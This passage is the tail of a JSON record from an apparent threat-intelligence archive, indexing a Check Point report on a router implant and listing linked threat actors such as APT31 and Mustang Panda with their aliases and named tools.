them\r\n}\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 44 of 45\n\nSource: https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 45 of 45\n\nOpen code in new EnlighterJS 3 Syntax window Highlighter \n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]\n9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]\n Page 2 of 45", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/" ], "report_names": [ "the-dragon-who-sold-his-camaro-analyzing-custom-router-implant" ], "threat_actors": [ { "id": "aacd5cbc-604b-4b6e-9e58-ef96c5d1a784", "created_at": "2023-01-06T13:46:38.953463Z", "updated_at": "2026-04-14T02:00:03.496308Z", "deleted_at": null, "main_name": "APT31", "aliases": [ "Red keres", "Violet Typhoon", "TA412", "JUDGMENT PANDA", "BRONZE VINEWOOD" ], "source_name": "MISPGALAXY:APT31", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9e6186dd-9334-4aac-9957-98f022cd3871", "created_at": "2022-10-25T15:50:23.357398Z", "updated_at": "2026-04-14T02:00:04.58979Z", "deleted_at": null, "main_name": "ZIRCONIUM", "aliases": [ "APT31", "Violet Typhoon" ], "source_name": "MITRE:ZIRCONIUM", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-14T02:00:03.435686Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "TANTALUM", "Twill Typhoon", "HoneyMyte", "Earth Preta", "Stately Taurus", "Polaris", "BRONZE PRESIDENT", "Red Lich", "TEMP.HEX", "TA416", "LuminousMoth" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-14T02:00:03.708616Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-14T02:00:03.65686Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479", "created_at": "2023-10-27T02:00:07.764261Z", "updated_at": "2026-04-14T02:00:03.772577Z", "deleted_at": null, "main_name": "Camaro Dragon", "aliases": [], "source_name": "MISPGALAXY:Camaro Dragon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-14T02:00:04.504477Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "74d9dada-0106-414a-8bb9-b0d527db7756", "created_at": "2025-08-07T02:03:24.69718Z", "updated_at": "2026-04-14T02:00:03.768395Z", "deleted_at": null, "main_name": "BRONZE VINEWOOD", "aliases": [ "APT31 ", "BRONZE EXPRESS ", "Judgment Panda ", "Red Keres", "TA412", "VINEWOOD ", "Violet Typhoon ", "ZIRCONIUM " ], "source_name": "Secureworks:BRONZE VINEWOOD", "tools": [ "DropboxAES RAT", "HanaLoader", "Metasploit", "Mimikatz", "Reverse ICMP shell", "Trochilus" ], "source_id": "Secureworks", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-14T02:00:05.249347Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1776133344, "ts_updated_at": 1776186098, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.pdf", "text": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.txt", "img": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.jpg" } }